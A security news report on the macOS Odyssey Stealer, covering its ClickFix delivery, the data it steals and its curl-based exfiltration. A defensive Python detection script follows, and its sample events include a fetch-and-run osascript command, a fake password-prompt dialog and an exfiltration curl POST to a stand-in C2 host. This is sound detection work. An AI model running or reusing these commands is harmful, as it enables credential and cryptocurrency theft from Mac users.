The macOS-targeting Poseidon Stealer is believed to have been rebranded as Odyssey Stealer, CYFIRMA reported Thursday.

The Poseidon malware-as-a-service (MaaS) was previously spread via Google Ads in a malvertising campaign reported by Malwarebytes in June 2024.

Now, Odyssey Stealer, attributed to Poseidon creator and AMOS Stealer co-author "Rodrigo," is being distributed through ClickFix campaigns on spoofed finance, cryptocurrency news and Apple App Store websites, according to CYFIRMA.

The ClickFix technique uses fake Cloudflare CAPTCHA prompts that instruct users to copy and paste a Base64-encoded command into the Mac Terminal to prove they are not a robot. Once decoded and run, the command fetches an osascript command that executes the malicious Odyssey AppleScript.

Upon execution, Odyssey displays a prompt requesting the user's device password, which the malware uses in an attempt to retrieve decrypted credentials from the Keychain service.

The infostealer targets Keychain, cryptocurrency wallet applications such as Electrum, Coinomi and Exodus, and browsers including Safari, Chrome and Firefox. Pilfered browser data includes saved passwords and payment information, browsing history, autofill data, details from cryptocurrency and authentication-related plugins, and browser session cookies that can be used to hijack account sessions.

Odyssey also grabs files from the Desktop and Documents folders with the following extensions: .txt, .pdf, .docx, .jpg, .png, .rtf and .kdbx (KeePass password databases).

Stolen data is copied to a temporary directory created by the malware, /tmp/lovemrtrump, and compressed into an archive named out.zip before exfiltration. The archive is then sent to the attacker's server via a curl POST request, with up to 10 additional attempts made every 60 seconds if the initial upload fails. The upload carries headers that let the attacker track victims by username and cid, as well as the malware buildid.

CYFIRMA also uncovered details about the Odyssey Stealer control panel, which lets operators view and manage their infected devices, stolen data logs and custom malware builds. The panel includes a "Google Cookies Restore" section for hijacking browser sessions using stolen cookies, a "Guest Mode" that lets prospective buyers of the Odyssey MaaS trial some features, and a dashboard for viewing attack statistics. Most of the Odyssey Stealer panels discovered by CYFIRMA were noted to be based in Russia.

Odyssey Stealer and Poseidon Stealer both share origins with AMOS Stealer, also known as Atomic Stealer, which is run as a separate macOS MaaS operation by a threat actor known as "ping3r." AMOS Stealer was noted to be spread using the ClickFix technique in another campaign reported earlier this month, highlighting the social engineering method's growing popularity.

The creation of Odyssey Stealer was also attributed to Rodrigo by Moonlock Lab, which found the infostealer being distributed via fake Ledger Live apps last month.

CYFIRMA published indicators of compromise (IoCs) for the latest campaign and recommends that organizations defend against Odyssey and similar malware by blocking osascript execution unless it is needed for business operations, employing application whitelisting, using real-time and behavior-based monitoring to detect and respond to intrusions, and blocking outbound communication to known malicious IP addresses and domains. Mac users are also advised to be wary of sites impersonating app stores and to install applications only from the official Mac App Store or verified developer websites.
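The ClickFix paste, the osascript credential prompt and the curl POST of /tmp/lovemrtrump/out.zip described above are all process-level behaviours, which is what the recommended behaviour-based monitoring has to key on. The script below is an added example, not code from CYFIRMA, Moonlock Lab or the malware itself: it triages constructed process-execution events (the log format, user names, the c2.example.invalid host and the Base64 stage-1 payload are all made up for this example) and reports why each suspicious event fired. The literal header names username, cid and buildid, and the `display dialog ... with hidden answer` idiom for the password prompt, are assumptions; the report as summarized here does not quote the script or the raw request.

```python
"""Behaviour-based triage of macOS process-execution events for the ClickFix ->
osascript -> curl chain described in the article. Added example: the event
format, user names, the c2.example.invalid host and the Base64 payload are all
constructed for illustration and are not taken from CYFIRMA's report."""
import base64
import binascii
import re

# Constructed stage-1 payload standing in for "a command that fetches an
# osascript command". The host is a reserved, non-resolvable name (assumption).
STAGE1_CMD = "curl -fsSL https://c2.example.invalid/stage2 | osascript"
STAGE1_B64 = base64.b64encode(STAGE1_CMD.encode()).decode()

# Constructed events in the form "<ts> <user> <parent> -> <proc>: <cmdline>".
SAMPLE_EVENTS = [
    f"2025-06-19T10:00:01Z alice Terminal -> zsh: echo {STAGE1_B64} | base64 -d | sh",
    "2025-06-19T10:00:03Z alice sh -> osascript: osascript -e 'display dialog "
    "\"macOS needs your password to continue\" default answer \"\" with hidden answer'",
    "2025-06-19T10:00:09Z alice osascript -> curl: curl -s -X POST "
    "-H 'username: alice' -H 'cid: 1234' -H 'buildid: 7' "
    "-F 'file=@/tmp/lovemrtrump/out.zip' https://c2.example.invalid/upload",
    "2025-06-19T10:05:00Z bob Terminal -> zsh: git status",
    "2025-06-19T10:06:00Z bob launchd -> osascript: osascript /Users/bob/scripts/backup.scpt",
    "2025-06-19T10:07:00Z bob zsh -> curl: curl -s -X POST -d 'q=1' https://api.example.com/search",
]

EVENT_RE = re.compile(r"^(?P<ts>\S+) (?P<user>\S+) (?P<parent>\S+) -> (?P<proc>\S+): (?P<cmd>.*)$")
# "base64 -d ... | sh" (also -D and --decode, both accepted by macOS base64)
B64_TO_SHELL = re.compile(r"base64\s+(?:-d|-D|--decode)\b[^|]*\|\s*(?:sh|bash|zsh)\b")
B64_TOKEN = re.compile(r"[A-Za-z0-9+/]{24,}={0,2}")
CURL_POST = re.compile(r"\bcurl\b.*(?:-X\s*POST|--data\b|-d\s|--form\b|-F\s)")
TRACKING_HEADERS = ("username", "cid", "buildid")   # literal header names: assumption
STAGING_ARTEFACTS = ("/tmp/lovemrtrump", "out.zip")  # staging dir and archive from the report
SCRIPT_PARENTS = {"sh", "bash", "zsh", "curl"}       # osascript fed by a shell or curl


def decode_embedded_base64(text: str) -> str:
    """Return the decoded form of the first valid long Base64 token in text, or ''."""
    for tok in B64_TOKEN.findall(text):
        try:
            return base64.b64decode(tok, validate=True).decode("utf-8", "replace")
        except (binascii.Error, ValueError):
            continue
    return ""


def analyse(event: str) -> list[str]:
    """Return the reasons an event looks like part of the Odyssey chain ([] if none)."""
    m = EVENT_RE.match(event)
    if not m:
        return []
    parent, proc, cmd = m["parent"], m["proc"], m["cmd"]
    reasons = []

    # 1. ClickFix: a Base64 blob pasted into Terminal and piped into a shell.
    if parent == "Terminal" and B64_TO_SHELL.search(cmd):
        reasons.append("base64-decoded command piped to a shell from Terminal (ClickFix paste)")
        decoded = decode_embedded_base64(cmd)
        if "osascript" in decoded:
            reasons.append(f"decoded payload invokes osascript: {decoded!r}")

    # 2. osascript launched by a shell or curl rather than by an app or launchd,
    #    or showing a hidden-answer dialog (generic AppleScript password idiom).
    if proc == "osascript":
        if parent in SCRIPT_PARENTS:
            reasons.append(f"osascript spawned by {parent}")
        if "hidden answer" in cmd:
            reasons.append("AppleScript dialog with hidden answer (credential prompt)")

    # 3. Exfiltration: curl POST carrying the tracking headers or staging paths.
    if CURL_POST.search(cmd):
        hdrs = [h for h in TRACKING_HEADERS if re.search(rf"-H\s+['\"]?{h}\s*:", cmd)]
        staged = [s for s in STAGING_ARTEFACTS if s in cmd]
        if len(hdrs) >= 2:
            reasons.append(f"curl POST with victim-tracking headers {hdrs}")
        if staged:
            reasons.append(f"curl POST references staging artefacts {staged}")
    return reasons


def scan(events: list[str]) -> list[tuple[int, list[str]]]:
    """Return (index, reasons) for every event that triggered at least one rule."""
    hits = []
    for i, ev in enumerate(events):
        reasons = analyse(ev)
        if reasons:
            hits.append((i, reasons))
    return hits


if __name__ == "__main__":
    for i, reasons in scan(SAMPLE_EVENTS):
        print(f"[{i}] {SAMPLE_EVENTS[i][:70]}...")
        for r in reasons:
            print("     -", r)
```

Each rule on its own is noisy (base64 has legitimate uses and launchd runs osascript jobs all day), so the benign events for "bob" deliberately do not fire; the value comes from correlating the three stages for one user inside a short window, which this per-event output leaves to the SIEM. The staging path and archive name are the IoCs from the report and should be expected to change between builds, whereas the paste-to-shell and shell-to-osascript patterns survive a rename.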
